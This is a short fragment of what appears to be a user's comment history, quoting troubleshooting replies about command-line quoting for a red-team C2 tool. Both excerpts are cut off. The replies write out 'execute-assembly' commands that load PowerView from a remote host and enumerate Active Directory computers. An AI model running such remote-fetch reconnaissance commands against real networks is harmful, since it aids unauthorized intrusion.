Winslow

Results 12 comments of Winslow

> Oh you know what, it's probably a nested encoding issue, it's a little un-intuitive but I think* this will work: > > ``` > execute-assembly powersharp.exe -- \"/m:http://192.168.0.44:81/poweretcomputer -identity...

> Yea that should go here, to appease the grumble parser: > > ``` > execute-assembly -- /opt/red/powersharp.exe \"/m:http://192.168.0.44:81/powerview.ps1\" \"/c:get-netcomputer -identity web01\" > ``` I modified source code of powersharp...